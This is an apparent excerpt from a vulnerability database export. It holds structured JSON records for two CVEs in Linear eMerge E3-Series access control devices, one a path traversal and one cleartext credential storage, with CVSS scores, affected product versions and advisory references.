          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_essential_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "1.00-06",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_essential:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_elite_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "1.00-06",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_elite:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2019-7253"
          }
        ]
      },
      "cve": "CVE-2019-7253",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "acInsufInfo": false,
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "NVD",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "obtainAllPrivilege": false,
                "obtainOtherPrivilege": false,
                "obtainUserPrivilege": false,
                "severity": "HIGH",
                "trust": 1.0,
                "userInteractionRequired": false,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Low",
                "accessVector": "Network",
                "authentication": "None",
                "author": "NVD",
                "availabilityImpact": "Partial",
                "baseScore": 7.5,
                "confidentialityImpact": "Partial",
                "exploitabilityScore": null,
                "id": "CVE-2019-7253",
                "impactScore": null,
                "integrityImpact": "Partial",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "High",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2019-21272",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "VHN-158688",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "NVD",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 9.8,
                "baseSeverity": "Critical",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2019-7253",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2019-7253",
                "trust": 1.8,
                "value": "CRITICAL"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2019-21272",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201907-110",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULHUB",
                "id": "VHN-158688",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-21272"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158688"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005907"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-110"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7253"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Linear eMerge E3-Series devices allow Directory Traversal. Linear eMerge E3 series devices contain a path traversal vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Nortek Security\u0026ControlLineareMergeE3-Series is an access control device from Nortek Security \u0026 Control. A path traversal vulnerability exists in the LineareMergeE3-Series device due to a program that failed to properly process sequences such as \\342\\200\\230../\\342\\200\\231. An attacker could exploit the vulnerability to traverse the file system and access files or directories outside of the restrictions",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2019-7253"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005907"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2019-21272"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158688"
          }
        ],
        "trust": 2.25
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2019-7253",
            "trust": 3.9
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-24-065-01",
            "trust": 0.8
          },
          {
            "db": "JVN",
            "id": "JVNVU96911165",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005907",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-110",
            "trust": 0.7
          },
          {
            "db": "CNVD",
            "id": "CNVD-2019-21272",
            "trust": 0.6
          },
          {
            "db": "VULHUB",
            "id": "VHN-158688",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-21272"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158688"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005907"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-110"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7253"
          }
        ]
      },
      "id": "VAR-201907-0153",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-21272"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158688"
          }
        ],
        "trust": 1.7
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "IoT"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-21272"
          }
        ]
      },
      "last_update_date": "2024-03-18T22:23:59.425000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "eMerge\u00a0E3-Series\u00a0Access\u00a0Control",
            "trust": 0.8,
            "url": "https://www.nortekcontrol.com/pdf/literature/emerge-e3-series-brochure.pdf"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005907"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-22",
            "trust": 1.1
          },
          {
            "problemtype": "Path traversal (CWE-22) [NVD evaluation ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-158688"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005907"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7253"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 3.1,
            "url": "https://www.applied-risk.com/resources/ar-2019-005"
          },
          {
            "trust": 2.3,
            "url": "https://applied-risk.com/labs/advisories"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2019-7253"
          },
          {
            "trust": 0.8,
            "url": "https://jvn.jp/vu/jvnvu96911165/"
          },
          {
            "trust": 0.8,
            "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-065-01"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-21272"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158688"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005907"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-110"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7253"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-21272"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158688"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005907"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-110"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7253"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-07-05T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2019-21272"
          },
          {
            "date": "2019-07-02T00:00:00",
            "db": "VULHUB",
            "id": "VHN-158688"
          },
          {
            "date": "2019-07-04T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-005907"
          },
          {
            "date": "2019-07-02T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201907-110"
          },
          {
            "date": "2019-07-02T19:15:10.930000",
            "db": "NVD",
            "id": "CVE-2019-7253"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-07-05T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2019-21272"
          },
          {
            "date": "2019-07-03T00:00:00",
            "db": "VULHUB",
            "id": "VHN-158688"
          },
          {
            "date": "2024-03-07T07:09:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-005907"
          },
          {
            "date": "2019-07-05T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201907-110"
          },
          {
            "date": "2019-07-03T17:19:15.327000",
            "db": "NVD",
            "id": "CVE-2019-7253"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-110"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Linear\u00a0eMerge\u00a0E3\u00a0 Path traversal vulnerability in series devices",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005907"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "path traversal",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-110"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201907-0161

    Vulnerability from variot - Updated: 2024-03-18 22:23

    Linear eMerge E3-Series devices have Cleartext Credentials in a Database. Linear eMerge E3 series devices contain a vulnerability related to certificate/password management.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Nortek Security & Control Linear eMerge E3-Series is an access control device from Nortek Security & Control, USA.

    Nortek Security & Control Linear eMerge E3-Series has a trust management issue vulnerability. Attackers can use this vulnerability to obtain clear text passwords and launch further attacks on the system. Currently there is no information about this vulnerability, please keep an eye on CNNVD or vendor announcements

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201907-0161",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "linear emerge elite",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "nortekcontrol",
            "version": "1.00-06"
          },
          {
            "model": "linear emerge essential",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "nortekcontrol",
            "version": "1.00-06"
          },
          {
            "model": "linear emerge elite",
            "scope": null,
            "trust": 0.8,
            "vendor": "nortek",
            "version": null
          },
          {
            "model": "linear emerge essential",
            "scope": null,
            "trust": 0.8,
            "vendor": "nortek",
            "version": null
          },
          {
            "model": "security\u0026control linear emerge e3-series",
            "scope": "lte",
            "trust": 0.6,
            "vendor": "nortek",
            "version": "\u003c=1.00-06"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34631"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006016"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7260"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_essential_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "1.00-06",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_essential:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_elite_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "1.00-06",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_elite:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2019-7260"
          }
        ]
      },
      "cve": "CVE-2019-7260",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "acInsufInfo": false,
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "NVD",
                "availabilityImpact": "NONE",
                "baseScore": 5.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "obtainAllPrivilege": false,
                "obtainOtherPrivilege": false,
                "obtainUserPrivilege": false,
                "severity": "MEDIUM",
                "trust": 1.0,
                "userInteractionRequired": false,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Low",
                "accessVector": "Network",
                "authentication": "None",
                "author": "NVD",
                "availabilityImpact": "None",
                "baseScore": 5.0,
                "confidentialityImpact": "Partial",
                "exploitabilityScore": null,
                "id": "CVE-2019-7260",
                "impactScore": null,
                "integrityImpact": "None",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "Medium",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "NONE",
                "baseScore": 5.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2019-34631",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "NONE",
                "baseScore": 5.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "VHN-158695",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "NVD",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 9.8,
                "baseSeverity": "Critical",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2019-7260",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2019-7260",
                "trust": 1.8,
                "value": "CRITICAL"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2019-34631",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201907-103",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULHUB",
                "id": "VHN-158695",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34631"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158695"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006016"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-103"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7260"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Linear eMerge E3-Series devices have Cleartext Credentials in a Database. Linear eMerge E3 series devices contain a vulnerability related to certificate/password management.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Nortek Security \u0026 Control Linear eMerge E3-Series is an access control device from Nortek Security \u0026 Control, USA. \n\nNortek Security \u0026 Control Linear eMerge E3-Series has a trust management issue vulnerability. Attackers can use this vulnerability to obtain clear text passwords and launch further attacks on the system. Currently there is no information about this vulnerability, please keep an eye on CNNVD or vendor announcements",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2019-7260"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006016"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2019-34631"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158695"
          }
        ],
        "trust": 2.25
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2019-7260",
            "trust": 3.9
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-24-065-01",
            "trust": 0.8
          },
          {
            "db": "JVN",
            "id": "JVNVU96911165",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006016",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-103",
            "trust": 0.7
          },
          {
            "db": "CNVD",
            "id": "CNVD-2019-34631",
            "trust": 0.6
          },
          {
            "db": "VULHUB",
            "id": "VHN-158695",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34631"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158695"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006016"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-103"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7260"
          }
        ]
      },
      "id": "VAR-201907-0161",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34631"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158695"
          }
        ],
        "trust": 1.7
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "IoT"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34631"
          }
        ]
      },
      "last_update_date": "2024-03-18T22:23:59.365000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Top\u00a0Page",
            "trust": 0.8,
            "url": "https://www.nortekcontrol.com/"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006016"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-522",
            "trust": 1.1
          },
          {
            "problemtype": "Certificate/password management (CWE-255) [NVD evaluation ]",
            "trust": 0.8
          },
          {
            "problemtype": "CWE-255",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-158695"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006016"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7260"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
